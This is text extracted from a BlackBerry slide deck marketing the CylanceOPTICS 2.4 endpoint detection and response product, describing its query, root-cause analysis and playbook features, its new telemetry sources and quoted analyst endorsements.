Download - CylanceOPTICS AI Powered EDR - BlackBerry
CylanceOPTICS 2.4Extended Visibility and
Unparalleled Prevention
Matthiew Morin
Senior Product Manager
▪ CylanceOPTICS Overview
▪ What are the key components of
CylanceOPTICS?
▪ What is new in CylanceOPTICS v2.4?
▪ What are experts saying about
CylanceOPTICS?
Agenda
What is CylanceOPTICS?
CylanceOPTICS is the endpoint detection and
response (EDR) component of the BlackBerry
Cylance AI Platform™ that leverages and
augments the prevention delivered by
CylancePROTECT®, providing consistent
visibility required to discover and remediate
hard to find threats.
CylancePROTECT
AI-Native Endpoint
Threat Prevention
DATA S CIE NCE HUM AN E X P E RTIS E
THRE AT RE S E ARCH
Cylance Smart Antivirus™
AI-Powered Protection for
Home and Small Business
CylanceThreatZERO™
Solution Implementation
and Human Expertise
Cylance Consulting
World Class IR, Forensics,
ICS and Red Team Services
CylanceOPTICS
ML-Powered Endpoint
Detection and Response
CylanceGUARD™
Proactive Managed
Detection and Response
CylanceOPTICS: AI-Driven Endpoint Prevention
Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions
PREVENT
ATTACKS
CONSTANTLY
MONITOR
ENDPOINTS
AUTOMATED
DECISIVE
ACTION
SMART THREAT
HUNTING WITH
INSTAQUERY
TAP INTO
CONTEXTUAL INFO
WITH FOCUS VIEW
How Do Analysts Define EDR?
CylanceOPTICS + Services
▪ Block malicious activity.
▪ Use various data analytics
techniques to detect
suspicious system behavior
D E T E C T I O N
▪ Provide contextual
information.
▪ Record and store endpoint-
system-level behaviors.
I N V E S T I G A T I O N
▪ Use various data analytics
techniques to detect
suspicious system behavior.
C O N T A I N M E N T
▪ Provide remediation
suggestions to restore
affected systems.
R E M E D I A T I O N
Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions
CylanceOPTICS Does What Others Can’t, Prevention-First EDR
▪ Focus is on preventing the
“unknown unknowns”
▪ Detection is an extension of our
prevention-based security
▪ Adding detection improves our
ability to prevent future attacks
▪ Preventing attacks creates more
time for proactive security
practices
Context Analysis Engine
▪ ML-powered detection on endpoints
▪ Constantly evolving detection logic
provided by Cylance’s Threat Research
team
▪ MITRE ATT&CK
▪ Novel attacks and actors seen in
the field
▪ Highly extensible custom logic exposed
to Users and Partners.
InstaQuery
▪ “Has this been seen in my
environment?”
▪ InstaQuery is a lightweight
analyst query with instant
access to the results
▪ Lets analysts quickly determine
if an endpoint is at risk
USE CASE:
Hunt for the prevalence of
ransomware IOCs throughout
a global environment
Focus View
▪ “How did this Threat get on a
Device?”
▪ Conduct root cause analysis
▪ Automatically gather contextual
evidence on:
▪ Threats
▪ Incidents
▪ Artifacts
USE CASES:
1. See command line arguments
used to decrypt initial
ransomware payloads
2. Observe support files being
introduced by malware
Packages & Playbooks
▪ Package Deploy allows complex
actions to be taken on endpoints at
scale on demand.
▪ Execute applications
▪ Collect artifacts
▪ Playbooks allow the same complex
actions to be taken automatically
when suspicious activity is detected.
▪ Collect additional critical forensic
information as soon as an
incident occurs.
▪ Scripting engine is exposed to Users
and Partners for near-infinite flexibility.
What’s New in CylanceOPTICS 2.4?
1. 2x Visibility into Endpoints
2. 5x Addressable Space with Context Analysis Engine
3. New InstaQuery Artifacts and Facets
4. New Focus View Data Points
What’s New in CylanceOPTICS 2.4?
DNSPowershell
IntrospectionWMI Introspection
Portable Executable
Parsing
Private Address
(RFC 1918 / RFC
4193) Space
Visibility
Windows Logon
Event Visibility
See which Processes
are resolving
domains.
Analyze the resolved
addresses, record
types, and more.
See activity occurring
within a Powershell
Interpreter or ‘novel’
methods of invoking
Powershell.
Analyze the Script
Payloads and
Content.
See activity occurring
within a WMI
Interpreter.
Analyze WMI
Consumers, Event
Filters, and
Referenced Files.
Use CylanceOPTICS
to conduct static
analysis of critical
executable file
information.
Analyze File Version
Information, Functions,
Import Tables, and
more.
Analyzes an
event originating
from a private
internet address
on a TCP/IP
network
Records what has
instigated a
Windows Logon
event, the user that
logged on, by which
IP address and
domain it was
initiated, when it was
initiated, and
artifacts of the
initiation
Enhanced visibility across several key events and focus points:
InstaQuery – DNS Request
▪ Question Name
▪ “Has mydomain.net been seen?”
▪ Record Value
▪ “Has a domain ever resolved to
this?”
InstaQuery – Powershell Trace
▪ Event ID
▪ “Show me all matches for Event
ID 4101.”
▪ Script Block Text
▪ “Has a script executed with this
text in it?”
▪ Payload
▪ “Has a payload or module
executed with this text in it?”
InstaQuery – WMI Trace
▪ Event ID
▪ “Show me all matches for Event
ID 5861.”
▪ Consumer Text
▪ “Has a WMI consumer been
created with this text in it?”
▪ Namespace
▪ “Has a WMI action been taken in
this Namespace?”
▪ Operation
▪ ”Has a WMI operation executed
with this text in it?”
InstaQuery – WMI Trace
▪ Event ID
▪ “Show me all matches for Event
ID 5861.”
▪ Consumer Text
▪ “Has a WMI consumer been
created with this text in it?”
▪ Namespace
▪ “Has a WMI action been taken in
this Namespace?”
▪ Operation
▪ ”Has a WMI operation executed
with this text in it?”
InstaQuery – Windows Event
▪ Event ID
▪ “Show me all matches for Event
ID 4624.”
▪ Provider ID
▪ “Show me all events from the
SecurityAudit provider”
▪ Class
▪ “Show me all ‘LogonLogoff
events.”
What Are Experts Saying About CylanceOPTICS?
Gartner Peer Insights
and Forrester: Total Economic
Impact™ Study
“Cylance is the best of breed in
threat detection and prevention.
Since installing CylancePROTECT
and OPTICS, we can sleep at night.”
— Gartner Peer Insights, April 2019.
In a study by Forrester, CylanceOPTICS▪ Improved the security team’s productivity by 10%
▪ Reduced lost time by 95%
▪ Reduced the expected cost of a major security
breach by 25%
— Forrester: The Total Economic Impact™ study of CylancePROTECT® and CylanceOPTICS™
May 2019